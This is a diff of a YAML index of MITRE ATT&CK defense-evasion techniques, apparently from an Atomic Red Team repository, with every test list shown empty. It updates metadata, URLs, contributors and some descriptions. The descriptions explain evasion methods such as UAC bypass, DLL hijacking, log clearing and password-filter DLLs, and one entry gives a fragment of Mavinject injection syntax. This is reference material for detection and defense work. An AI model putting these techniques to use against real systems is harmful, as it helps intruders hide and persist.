       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.008
     atomic_tests: []
   T1027.013:
     technique:
-      modified: '2024-04-19T04:03:07.164Z'
+      modified: '2024-10-15T16:32:45.108Z'
       name: Encrypted/Encoded File
       description: "Adversaries may encrypt or encode files to obfuscate strings,
         bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:50.568Z'
       name: Rootkit
       description: "Adversaries may use rootkits to hide the presence of programs,
         files, network connections, services, drivers, and other system components.
@@ -1098,7 +1183,6 @@ defense-evasion:
         url: https://en.wikipedia.org/wiki/Rootkit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1014
     atomic_tests: []
   T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
         url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
         description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
           with double extension?. Retrieved July 27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:09:59.588Z'
       name: 'Masquerading: Double File Extension'
       description: "Adversaries may abuse a double extension in the filename as a
         means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1036.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1273,7 +1355,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1578:
     technique:
-      modified: '2023-09-05T20:45:22.041Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Modify Cloud Compute Infrastructure
       description: |-
         An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
       - source_name: Mandiant M-Trends 2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542.001:
     technique:
@@ -1481,12 +1559,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -1635,7 +1711,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1218.013:
     technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
         PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would
         inject an import table entry consisting of the specified DLL into the module
         at the given base address.(Citation: Mavinject Functionality Deconstructed)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:35:08.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Mavinject
       x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.005:
     technique:
-      modified: '2023-09-14T21:12:48.409Z'
+      modified: '2024-09-12T19:30:45.064Z'
       name: 'Masquerading: Match Legitimate Name or Location'
       description: |-
         Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
         external_id: T1036.005
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Docker Images
         description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
         url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
         url: https://www.elastic.co/blog/how-hunt-masquerade-ball
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.005
     atomic_tests: []
   T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:49.258Z'
       name: Weaken Encryption
       description: |-
         Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1036.008:
     technique:
@@ -1883,11 +1954,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564:
     technique:
-      modified: '2024-03-29T17:45:48.126Z'
+      modified: '2024-10-15T15:58:49.815Z'
       name: Hide Artifacts
       description: |-
         Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Metadata'
       - 'Application Log: Application Log Content'
@@ -1953,12 +2023,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -2000,9 +2074,8 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -2019,6 +2092,10 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
         url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
         description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
           30, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-31T14:51:47.352Z'
       name: 'Impair Defenses: Safe Boot Mode'
       description: |-
         Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2130,8 +2206,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1562.009
     atomic_tests: []
   T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1070.002:
@@ -2323,7 +2394,7 @@ defense-evasion:
         url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
         description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
           be Monitoring. Retrieved March 29, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T21:23:51.886Z'
       name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
       description: |
         Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
       - 'File: File Deletion'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1070.002
     atomic_tests: []
   T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
       - source_name: LOLBAS Installutil
         url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
         description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:47:52.603Z'
       name: 'Signed Binary Proxy Execution: InstallUtil'
       description: |-
         Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.
@@ -2404,8 +2473,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.004
     atomic_tests: []
   T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -2484,8 +2550,8 @@ defense-evasion:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -2552,12 +2622,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1553.001:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-21T19:30:58.414Z'
       name: 'Subvert Trust Controls: Gatekeeper Bypass'
       description: |-
         Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.001
     atomic_tests: []
   T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.009:
     technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:27:04.900Z'
       name: 'File and Directory Permissions Modification: Windows File and Directory
         Permissions Modification'
       description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.007:
     technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
         Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
 
         Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:33:16.346Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Binary Proxy Execution: Msiexec'
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.007
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -3041,22 +3080,44 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
